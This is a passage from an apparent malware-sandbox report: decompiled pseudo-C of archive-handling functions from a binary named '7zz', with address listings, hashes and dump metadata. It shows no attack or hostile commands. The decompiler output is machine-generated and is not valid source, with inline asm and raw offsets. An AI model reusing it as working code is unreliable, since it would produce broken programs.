										 *(_t255 - 4) = 1;
										E0042D093(_t252, _t255 - 0x30);
										 *((intOrPtr*)(_t255 - 0x40)) = 0;
										 *(_t255 - 0x3c) = 0;
										 *((intOrPtr*)(_t255 - 0x38)) = 0;
										 *((intOrPtr*)(_t255 - 0x34)) = 4;
										 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
										_t210 =  *((intOrPtr*)(_t252 + 0x18));
										 *(_t255 - 4) = 2;
										_t152 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
										__eflags = _t152 - 1;
										if(_t152 != 1) {
											L39:
											__eflags = _t152 - 0x17;
											if(_t152 != 0x17) {
												L41:
												E0042D0F8(_t210);
												L42:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												_t211 = _t252;
												_push( *((intOrPtr*)(_t255 + 0xc)));
												_push(_t255 - 0x44);
												_push(_t246 + 0x150);
												_push( *((intOrPtr*)(_t246 + 0x144)));
												_push( *((intOrPtr*)(_t246 + 0x140)));
												_t156 = E0042E01C(_t252, _t232, __eflags); // executed
												__eflags = _t156;
												if(_t156 == 0) {
													__eflags =  *(_t255 - 0x3c);
													if( *(_t255 - 0x3c) != 0) {
														__eflags =  *(_t255 - 0x3c) - 1;
														if( *(_t255 - 0x3c) > 1) {
															E0042D0F8(_t211);
														}
														E0042CFE5(_t255 - 0x54);
														E0042D093(_t252,  *((intOrPtr*)( *((intOrPtr*)(_t255 - 0x38)))));
														_t214 =  *((intOrPtr*)(_t252 + 0x18));
														_t160 = E0042D1A5( *((intOrPtr*)(_t252 + 0x18)), _t232);
														__eflags = _t160 - 1;
														if(_t160 != 1) {
															L50:
															E0042D0F8(_t214);
															goto L51;
														} else {
															__eflags = _t232;
															if(_t232 == 0) {
																goto L51;
															}
															goto L50;
														}
													}
													 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
													 *(_t255 - 4) = 4;
													_t254 = 0;
													goto L53;
												}
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 3;
												goto L52;
											}
											__eflags = _t232;
											if(__eflags == 0) {
												goto L42;
											}
											goto L41;
										} else {
											__eflags = _t232;
											if(_t232 == 0) {
												L51:
												_push( *((intOrPtr*)(_t255 + 0x10)));
												 *((intOrPtr*)(_t246 + 0x1c0)) =  *((intOrPtr*)(_t252 + 0x48));
												_push( *((intOrPtr*)(_t255 + 0xc)));
												 *((intOrPtr*)(_t246 + 0x1c4)) =  *((intOrPtr*)(_t252 + 0x4c));
												_push(_t246);
												_t156 = E0042E3B2(_t252, _t232);
												 *((intOrPtr*)(_t255 - 0x44)) = 0x47b3e0;
												 *(_t255 - 4) = 5;
												L52:
												_t254 = _t156;
												L53:
												E0040862D();
												 *(_t255 - 4) = 1;
												E00408604(_t255 - 0x44);
												_t123 = _t255 - 4;
												 *_t123 =  *(_t255 - 4) & 0x00000000;
												__eflags =  *_t123;
												E0042CFE5(_t255 - 0x54);
												L54:
												 *((intOrPtr*)(_t255 - 0x30)) = 0x47a7ec;
												L00407A18( *((intOrPtr*)(_t255 - 0x28)));
												_t143 = _t254;
												goto L55;
											}
											goto L39;
										}
									}
									_t254 = _t146;
									goto L54;
								}
								if(__eflags < 0) {
									goto L31;
								}
								__eflags = _t244;
								if(_t244 >= 0) {
									goto L32;
								}
								goto L31;
							}
							_t143 = 0;
							goto L55;
						}
					}
					goto L55;
				}
			}


































                                                                                  0x0042ec61
                                                                                  0x0042ec6f
                                                                                  0x0042ec72
                                                                                  0x0042ec76
                                                                                  0x0042ec7e
                                                                                  0x0042ec87
                                                                                  0x0042ec90
                                                                                  0x0042ec96
                                                                                  0x0042ec98
                                                                                  0x0042ec9e
                                                                                  0x0042eca4
                                                                                  0x0042eca6
                                                                                  0x0042eca6
                                                                                  0x0042ecae
                                                                                  0x0042ecb1
                                                                                  0x0042ecb7
                                                                                  0x0042ecba
                                                                                  0x0042ecc3
                                                                                  0x0042eccb
                                                                                  0x0042ecce
                                                                                  0x0042eccf
                                                                                  0x0042ecd9
                                                                                  0x0042ee08
                                                                                  0x0042ee0b
                                                                                  0x0042ee0d
                                                                                  0x0042ee0d
                                                                                  0x00000000
                                                                                  0x0042ecfe
                                                                                  0x0042ecfe
                                                                                  0x0042ed0b
                                                                                  0x0042ed10
                                                                                  0x0042f013
                                                                                  0x0042f019
                                                                                  0x0042f021
                                                                                  0x0042f021
                                                                                  0x0042ed16
                                                                                  0x0042ed25
                                                                                  0x0042ed2a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ed30
                                                                                  0x0042ed33
                                                                                  0x0042ed38
                                                                                  0x0042ed3d
                                                                                  0x0042ed40
                                                                                  0x0042ed43
                                                                                  0x0042ed46
                                                                                  0x0042ed4f
                                                                                  0x0042ed4f
                                                                                  0x0042ed51
                                                                                  0x0042ed5f
                                                                                  0x0042ed63
                                                                                  0x0042ed66
                                                                                  0x0042ed68
                                                                                  0x0042ed71
                                                                                  0x0042ed77
                                                                                  0x0042ed7e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ed84
                                                                                  0x0042ed84
                                                                                  0x0042ed89
                                                                                  0x0042ee52
                                                                                  0x0042ee54
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ed8f
                                                                                  0x0042ed8f
                                                                                  0x0042ed8f
                                                                                  0x0042ed98
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042eda6
                                                                                  0x0042edb2
                                                                                  0x0042edb3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042edb3
                                                                                  0x00000000
                                                                                  0x0042eda6
                                                                                  0x0042edb7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042edc1
                                                                                  0x0042edc2
                                                                                  0x0042edc7
                                                                                  0x0042edd1
                                                                                  0x0042edd4
                                                                                  0x0042eddc
                                                                                  0x0042eddf
                                                                                  0x0042ede2
                                                                                  0x0042ede5
                                                                                  0x0042edf1
                                                                                  0x0042edf4
                                                                                  0x0042edfc
                                                                                  0x0042ee01
                                                                                  0x0042ee12
                                                                                  0x0042ee18
                                                                                  0x0042ee1e
                                                                                  0x0042ee21
                                                                                  0x0042ee27
                                                                                  0x0042ee30
                                                                                  0x0042ee33
                                                                                  0x0042ee3c
                                                                                  0x0042ee40
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ee42
                                                                                  0x0042ee46
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ee48
                                                                                  0x0042ee4a
                                                                                  0x0042ee5a
                                                                                  0x0042ee5a
                                                                                  0x0042ee65
                                                                                  0x0042ee6a
                                                                                  0x0042ee6c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ee72
                                                                                  0x0042ee75
                                                                                  0x0042ee78
                                                                                  0x0042ee82
                                                                                  0x0042ee88
                                                                                  0x0042ee95
                                                                                  0x0042ee9a
                                                                                  0x0042ee9c
                                                                                  0x0042eeb0
                                                                                  0x0042eeb3
                                                                                  0x0042eeb6
                                                                                  0x0042eeb9
                                                                                  0x0042eec0
                                                                                  0x0042eec3
                                                                                  0x0042eec8
                                                                                  0x0042eecb
                                                                                  0x0042eed1
                                                                                  0x0042eed4
                                                                                  0x0042eeda
                                                                                  0x0042eedf
                                                                                  0x0042eee2
                                                                                  0x0042eee4
                                                                                  0x0042eee4
                                                                                  0x0042eee9
                                                                                  0x0042eef5
                                                                                  0x0042eef9
                                                                                  0x0042ef05
                                                                                  0x0042ef08
                                                                                  0x0042ef0b
                                                                                  0x0042ef0e
                                                                                  0x0042ef15
                                                                                  0x0042ef18
                                                                                  0x0042ef1b
                                                                                  0x0042ef1f
                                                                                  0x0042ef24
                                                                                  0x0042ef27
                                                                                  0x0042ef31
                                                                                  0x0042ef31
                                                                                  0x0042ef34
                                                                                  0x0042ef3a
                                                                                  0x0042ef3a
                                                                                  0x0042ef3f
                                                                                  0x0042ef3f
                                                                                  0x0042ef45
                                                                                  0x0042ef47
                                                                                  0x0042ef4a
                                                                                  0x0042ef51
                                                                                  0x0042ef52
                                                                                  0x0042ef58
                                                                                  0x0042ef5e
                                                                                  0x0042ef63
                                                                                  0x0042ef65
                                                                                  0x0042ef70
                                                                                  0x0042ef74
                                                                                  0x0042ef81
                                                                                  0x0042ef85
                                                                                  0x0042ef87
                                                                                  0x0042ef87
                                                                                  0x0042ef8f
                                                                                  0x0042ef9d
                                                                                  0x0042efa2
                                                                                  0x0042efa5
                                                                                  0x0042efaa
                                                                                  0x0042efad
                                                                                  0x0042efb3
                                                                                  0x0042efb3
                                                                                  0x00000000
                                                                                  0x0042efaf
                                                                                  0x0042efaf
                                                                                  0x0042efb1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042efb1
                                                                                  0x0042efad
                                                                                  0x0042ef76
                                                                                  0x0042ef79
                                                                                  0x0042ef7d
                                                                                  0x00000000
                                                                                  0x0042ef7d
                                                                                  0x0042ef67
                                                                                  0x0042ef6a
                                                                                  0x00000000
                                                                                  0x0042ef6a
                                                                                  0x0042ef36
                                                                                  0x0042ef38
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ef29
                                                                                  0x0042ef29
                                                                                  0x0042ef2b
                                                                                  0x0042efb8
                                                                                  0x0042efb8
                                                                                  0x0042efbe
                                                                                  0x0042efc7
                                                                                  0x0042efcc
                                                                                  0x0042efd2
                                                                                  0x0042efd3
                                                                                  0x0042efd8
                                                                                  0x0042efdb
                                                                                  0x0042efdf
                                                                                  0x0042efdf
                                                                                  0x0042efe1
                                                                                  0x0042efe4
                                                                                  0x0042efec
                                                                                  0x0042eff0
                                                                                  0x0042eff5
                                                                                  0x0042eff5
                                                                                  0x0042eff5
                                                                                  0x0042effc
                                                                                  0x0042f001
                                                                                  0x0042f004
                                                                                  0x0042f00b
                                                                                  0x0042f011
                                                                                  0x00000000
                                                                                  0x0042f011
                                                                                  0x00000000
                                                                                  0x0042ef2b
                                                                                  0x0042ef27
                                                                                  0x0042ee9e
                                                                                  0x00000000
                                                                                  0x0042ee9e
                                                                                  0x0042ee4c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ee4e
                                                                                  0x0042ee50
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042ee50
                                                                                  0x0042ee35
                                                                                  0x00000000
                                                                                  0x0042ee35
                                                                                  0x0042ee03
                                                                                  0x00000000
                                                                                  0x0042ed68

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: c[@
                                                                                  • API String ID: 3519838083-2588109156
                                                                                  • Opcode ID: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
                                                                                  • Instruction ID: bcf0ec3d1ae188e7939240ae46176005842349514c47eef13008c3777b72f97c
                                                                                  • Opcode Fuzzy Hash: 8a64972ee4c077eab65c48b087dce4589bc7ef48ef535aabefce3003df9f5d4d
                                                                                  • Instruction Fuzzy Hash: A3C19D70B00219AFDF24CFA6D980BEEBBB1BF48304F64442EE405A7341DB79A945CB58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0042E01C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 91%
                                                                                  			E0042E01C(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t192;
				intOrPtr* _t198;
				intOrPtr _t203;
				void* _t221;
				void* _t228;
				intOrPtr _t269;
				signed int _t273;
				intOrPtr* _t275;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t285;
				void* _t286;
				void* _t291;

				_t291 = __eflags;
				_t273 = __edx;
				L0046B890(0x4775cd, _t286);
				_t275 = __ecx;
				E00404AD0(_t286 - 0x5c, 8);
				 *((intOrPtr*)(_t286 - 0x5c)) = 0x47a688;
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				E00404AD0(_t286 - 0xd8, 1);
				 *((intOrPtr*)(_t286 - 0xd8)) = 0x47ab08;
				E00404AD0(_t286 - 0xc4, 4);
				 *((intOrPtr*)(_t286 - 0xc4)) = 0x47ab80;
				 *(_t286 - 4) = 2;
				E00405B9F(_t286 - 0x30);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				E00404AD0(_t286 - 0x84, 4);
				 *((intOrPtr*)(_t286 - 0x84)) = 0x47ab80;
				E00404AD0(_t286 - 0x9c, 8);
				 *((intOrPtr*)(_t286 - 0x9c)) = 0x47a688;
				E00404AD0(_t286 - 0xb0, 1);
				 *((intOrPtr*)(_t286 - 0xb0)) = 0x47ab08;
				E00404AD0(_t286 - 0x70, 4);
				 *((intOrPtr*)(_t286 - 0x70)) = 0x47ab80;
				_t279 =  *((intOrPtr*)(_t286 + 0x10));
				 *(_t286 - 4) = 7;
				E0042DE7C(__ecx, __edx, 0, _t279, _t286 - 0x5c, _t286 - 0xd8, _t286 - 0xc4, _t286 - 0x30, _t286 - 0x84, _t286 - 0x9c, _t286 - 0xb0, _t286 - 0x70);
				 *(_t286 - 0x14) =  *(_t286 - 0x14) & 0x00000000;
				E00426448(_t286 - 0x164, _t291, 1);
				_t228 =  *_t279 +  *((intOrPtr*)(_t286 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t286 + 0xc) =  *(_t286 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t286 - 0x34)) =  *((intOrPtr*)(_t279 + 4));
				if( *((intOrPtr*)(_t286 - 0x28)) <= 0) {
					L17:
					 *(_t286 - 4) = 7;
					E00429925(_t286 - 0x164, _t303); // executed
					 *(_t286 - 4) = 6;
					E00408604(_t286 - 0x70);
					 *(_t286 - 4) = 5;
					E00408604(_t286 - 0xb0);
					 *(_t286 - 4) = 4;
					E00408604(_t286 - 0x9c);
					 *(_t286 - 4) = 3;
					E00408604(_t286 - 0x84);
					 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
					 *(_t286 - 4) = 0xc;
					_t281 = 0;
					L18:
					E0040862D();
					 *(_t286 - 4) = 2;
					E00408604(_t286 - 0x30);
					 *(_t286 - 4) = 1;
					E00408604(_t286 - 0xc4);
					 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
					E00408604(_t286 - 0xd8);
					 *(_t286 - 4) =  *(_t286 - 4) | 0xffffffff;
					E00408604(_t286 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t286 - 0xc));
					return _t281;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t286 - 0x40) =  *(_t286 - 0x40) & 0x00000000;
					 *(_t286 - 0x3c) =  *(_t286 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t286 - 0x24)) +  *(_t286 + 0xc) * 4));
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					_push(_t286 - 0x44);
					 *(_t286 - 4) = 9;
					L0042F129( *((intOrPtr*)(_t286 + 0x14)));
					 *(_t286 - 4) = 8;
					 *((intOrPtr*)(_t286 - 0x44)) = 0x47a7ec;
					L00407A18( *(_t286 - 0x3c));
					_t192 =  *((intOrPtr*)(_t286 + 0x14));
					_t284 =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x10) =  *( *((intOrPtr*)(_t192 + 0xc)) +  *(_t192 + 8) * 4 - 4);
					 *(_t286 - 0x1c) = E00429826( *((intOrPtr*)(_t286 + 0x10)));
					_t257 =  *(_t286 - 0x1c);
					if( *(_t286 - 0x1c) !=  *(_t286 - 0x1c) || 0 != _t273) {
						E0042D0F8(_t257);
					}
					L0040FA26(_t284,  *(_t286 - 0x1c));
					_push(0x14);
					_t198 = L004079F2();
					_t285 = 0;
					if(_t198 != 0) {
						 *((intOrPtr*)(_t198 + 4)) = 0;
						 *_t198 = 0x47b3d0;
						_t285 = _t198;
					}
					_t296 = _t285;
					 *((intOrPtr*)(_t286 - 0x88)) = _t285;
					if(_t285 != 0) {
						 *((intOrPtr*)( *_t285 + 4))(_t285);
					}
					_t273 =  *(_t286 - 0x14);
					 *((intOrPtr*)(_t285 + 8)) =  *((intOrPtr*)( *(_t286 - 0x10) + 8));
					 *((intOrPtr*)(_t285 + 0x10)) = 0;
					 *(_t285 + 0xc) =  *(_t286 - 0x1c);
					 *(_t286 - 4) = 0xa;
					_t203 = E004264F7(_t286 - 0x164, _t296,  *_t275, _t228,  *((intOrPtr*)(_t286 - 0x34)),  *(_t286 - 0x50) + _t273 * 8,  *((intOrPtr*)(_t286 + 0x10)), _t285, 0,  *((intOrPtr*)(_t286 + 0x18)),  *((intOrPtr*)(_t286 + 0x1c)), 0, 1); // executed
					 *((intOrPtr*)(_t286 - 0x48)) = _t203;
					if(_t203 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t286 + 0x10)) + 0x54)) != 0) {
						_t273 =  *(_t286 - 0x1c);
						_t221 = L0046B1C0( *((intOrPtr*)( *(_t286 - 0x10) + 8)), _t273);
						_t272 =  *((intOrPtr*)(_t286 + 0x10));
						if(_t221 !=  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x50))) {
							E0042D0F8(_t272);
						}
					}
					 *(_t286 - 0x10) =  *(_t286 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t286 - 4) = 8;
						if(_t285 != 0) {
							 *((intOrPtr*)( *_t285 + 8))(_t285);
						}
						 *(_t286 + 0xc) =  *(_t286 + 0xc) + 1;
						_t303 =  *(_t286 + 0xc) -  *((intOrPtr*)(_t286 - 0x28));
						if( *(_t286 + 0xc) <  *((intOrPtr*)(_t286 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t273 =  *(_t286 - 0x50);
							 *(_t286 - 0x14) =  *(_t286 - 0x14) + 1;
							_t269 =  *((intOrPtr*)(( *(_t286 - 0x14) << 3) + _t273));
							_t228 = _t228 + _t269;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t275 + 0x48)) =  *((intOrPtr*)(_t275 + 0x48)) + _t269;
							asm("adc [edi+0x4c], eax");
							 *(_t286 - 0x10) =  *(_t286 - 0x10) + 1;
						} while ( *(_t286 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t286 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t285;
				 *(_t286 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t285 + 8))(_t285);
				}
				 *(_t286 - 4) = 7;
				E00429925(_t286 - 0x164, __eflags);
				 *(_t286 - 4) = 6;
				E00408604(_t286 - 0x70);
				 *(_t286 - 4) = 5;
				E00408604(_t286 - 0xb0);
				 *(_t286 - 4) = 4;
				E00408604(_t286 - 0x9c);
				 *(_t286 - 4) = 3;
				E00408604(_t286 - 0x84);
				 *((intOrPtr*)(_t286 - 0x30)) = 0x47b3a8;
				_t281 =  *((intOrPtr*)(_t286 - 0x48));
				 *(_t286 - 4) = 0xb;
				goto L18;
			}
















                                                                                  0x0042e01c
                                                                                  0x0042e01c
                                                                                  0x0042e021
                                                                                  0x0042e02f
                                                                                  0x0042e036
                                                                                  0x0042e03b
                                                                                  0x0042e042
                                                                                  0x0042e04e
                                                                                  0x0042e058
                                                                                  0x0042e066
                                                                                  0x0042e070
                                                                                  0x0042e079
                                                                                  0x0042e07d
                                                                                  0x0042e082
                                                                                  0x0042e091
                                                                                  0x0042e096
                                                                                  0x0042e0a4
                                                                                  0x0042e0a9
                                                                                  0x0042e0bb
                                                                                  0x0042e0c0
                                                                                  0x0042e0cb
                                                                                  0x0042e0d0
                                                                                  0x0042e0d6
                                                                                  0x0042e10a
                                                                                  0x0042e10e
                                                                                  0x0042e113
                                                                                  0x0042e11f
                                                                                  0x0042e129
                                                                                  0x0042e12c
                                                                                  0x0042e12f
                                                                                  0x0042e137
                                                                                  0x0042e13a
                                                                                  0x0042e2a3
                                                                                  0x0042e2a9
                                                                                  0x0042e2ad
                                                                                  0x0042e2b5
                                                                                  0x0042e2b9
                                                                                  0x0042e2c4
                                                                                  0x0042e2c8
                                                                                  0x0042e2d3
                                                                                  0x0042e2d7
                                                                                  0x0042e2e2
                                                                                  0x0042e2e6
                                                                                  0x0042e2eb
                                                                                  0x0042e2f2
                                                                                  0x0042e2f6
                                                                                  0x0042e2f8
                                                                                  0x0042e2fb
                                                                                  0x0042e303
                                                                                  0x0042e307
                                                                                  0x0042e312
                                                                                  0x0042e316
                                                                                  0x0042e31b
                                                                                  0x0042e325
                                                                                  0x0042e32a
                                                                                  0x0042e331
                                                                                  0x0042e33e
                                                                                  0x0042e346
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042e140
                                                                                  0x0042e140
                                                                                  0x0042e146
                                                                                  0x0042e14a
                                                                                  0x0042e156
                                                                                  0x0042e159
                                                                                  0x0042e162
                                                                                  0x0042e163
                                                                                  0x0042e167
                                                                                  0x0042e16f
                                                                                  0x0042e173
                                                                                  0x0042e176
                                                                                  0x0042e17b
                                                                                  0x0042e185
                                                                                  0x0042e18c
                                                                                  0x0042e194
                                                                                  0x0042e199
                                                                                  0x0042e19e
                                                                                  0x0042e1a4
                                                                                  0x0042e1a4
                                                                                  0x0042e1ae
                                                                                  0x0042e1b3
                                                                                  0x0042e1b5
                                                                                  0x0042e1ba
                                                                                  0x0042e1bf
                                                                                  0x0042e1c1
                                                                                  0x0042e1c4
                                                                                  0x0042e1ca
                                                                                  0x0042e1ca
                                                                                  0x0042e1cc
                                                                                  0x0042e1ce
                                                                                  0x0042e1d4
                                                                                  0x0042e1d9
                                                                                  0x0042e1d9
                                                                                  0x0042e1ea
                                                                                  0x0042e1ed
                                                                                  0x0042e1f6
                                                                                  0x0042e1f9
                                                                                  0x0042e209
                                                                                  0x0042e219
                                                                                  0x0042e220
                                                                                  0x0042e223
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042e230
                                                                                  0x0042e235
                                                                                  0x0042e23b
                                                                                  0x0042e240
                                                                                  0x0042e246
                                                                                  0x0042e248
                                                                                  0x0042e248
                                                                                  0x0042e246
                                                                                  0x0042e250
                                                                                  0x0042e258
                                                                                  0x0042e286
                                                                                  0x0042e288
                                                                                  0x0042e28c
                                                                                  0x0042e291
                                                                                  0x0042e291
                                                                                  0x0042e294
                                                                                  0x0042e29a
                                                                                  0x0042e29d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0042e25a
                                                                                  0x0042e25a
                                                                                  0x0042e25d
                                                                                  0x0042e263
                                                                                  0x0042e266
                                                                                  0x0042e26d
                                                                                  0x0042e26f
                                                                                  0x0042e272
                                                                                  0x0042e275
                                                                                  0x0042e278
                                                                                  0x0042e281
                                                                                  0x00000000
                                                                                  0x0042e25a
                                                                                  0x0042e258
                                                                                  0x0042e349
                                                                                  0x0042e34b
                                                                                  0x0042e34f
                                                                                  0x0042e354
                                                                                  0x0042e354
                                                                                  0x0042e35d
                                                                                  0x0042e361
                                                                                  0x0042e369
                                                                                  0x0042e36d
                                                                                  0x0042e378
                                                                                  0x0042e37c
                                                                                  0x0042e387
                                                                                  0x0042e38b
                                                                                  0x0042e396
                                                                                  0x0042e39a
                                                                                  0x0042e39f
                                                                                  0x0042e3a6
                                                                                  0x0042e3a9
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0042E021
                                                                                    • Part of subcall function 0042F129: __EH_prolog.LIBCMT ref: 0042F12E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: c[@
                                                                                  • API String ID: 3519838083-2588109156
                                                                                  • Opcode ID: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
                                                                                  • Instruction ID: 13632c0e7c80ea0d0342c65c90266a16cd9ecf8cb86b77326c192e1623b2d142
                                                                                  • Opcode Fuzzy Hash: 37a9ed40db553d9be7e5d6efad5c6be87b7fe848da45eb624cf300f350e8dd1e
                                                                                  • Instruction Fuzzy Hash: 05C14A70D00268DFDB14DF95D945BEEB7B4BF14308F14809EE909A7291CB786A48CFA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0041003E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 202COMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 91%
                                                                                  			E0041003E(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* _t125;
				intOrPtr* _t128;
				void* _t142;
				signed int _t168;
				intOrPtr* _t175;
				intOrPtr _t176;
				signed int _t208;
				void* _t209;
				signed int _t212;
				void* _t218;

				L0046B890(E00474107, _t218);
				 *((intOrPtr*)(_t218 - 0x24)) = __edx;
				E00405B9F(_t218 - 0x38);
				 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
				_t168 = 0;
				 *(_t218 - 4) = 0;
				L14();
				 *(_t218 - 4) = 1;
				E00405B9F(_t218 - 0x20);
				 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
				 *(_t218 - 4) = 2;
				E00404AD0(_t218 - 0x74, 4);
				 *((intOrPtr*)(_t218 - 0x74)) = 0x47a9ac;
				_push(_t218 - 0x74);
				_push(_t218 - 0x20);
				_push(0);
				_t175 = __ecx;
				 *(_t218 - 4) = 3;
				_t125 = E00415349(__ecx, _t218 - 0xc4); // executed
				if(_t125 != 0 ||  *(_t218 - 0x18) > 0) {
					 *(_t218 + 8) = "cannot find archive";
					L0046B8F4(_t218 + 8, 0x47cf70);
					_push(0x47a420);
					_t128 = _t175;
					__eflags = 0;
					_t176 = 4;
					 *((intOrPtr*)(_t128 + 4)) = 0;
					 *((intOrPtr*)(_t128 + 8)) = 0;
					 *((intOrPtr*)(_t128 + 0xc)) = 0;
					 *((intOrPtr*)(_t128 + 0x10)) = _t176;
					 *_t128 = 0x47a420;
					 *((intOrPtr*)(_t128 + 0x18)) = 0;
					 *((intOrPtr*)(_t128 + 0x1c)) = 0;
					 *((intOrPtr*)(_t128 + 0x20)) = 0;
					 *((intOrPtr*)(_t128 + 0x24)) = _t176;
					 *((intOrPtr*)(_t128 + 0x14)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x2c)) = 0;
					 *((intOrPtr*)(_t128 + 0x30)) = 0;
					 *((intOrPtr*)(_t128 + 0x34)) = 0;
					 *((intOrPtr*)(_t128 + 0x38)) = _t176;
					 *((intOrPtr*)(_t128 + 0x28)) = 0x47a668;
					 *((intOrPtr*)(_t128 + 0x40)) = 0;
					 *((intOrPtr*)(_t128 + 0x44)) = 0;
					 *((intOrPtr*)(_t128 + 0x48)) = 0;
					 *((intOrPtr*)(_t128 + 0x4c)) = _t176;
					 *((intOrPtr*)(_t128 + 0x3c)) = 0x47aa4c;
					return _t128;
				} else {
					 *(_t218 - 4) = 2;
					E00408604(_t218 - 0x74);
					 *((intOrPtr*)(_t218 - 0x20)) = 0x47a420;
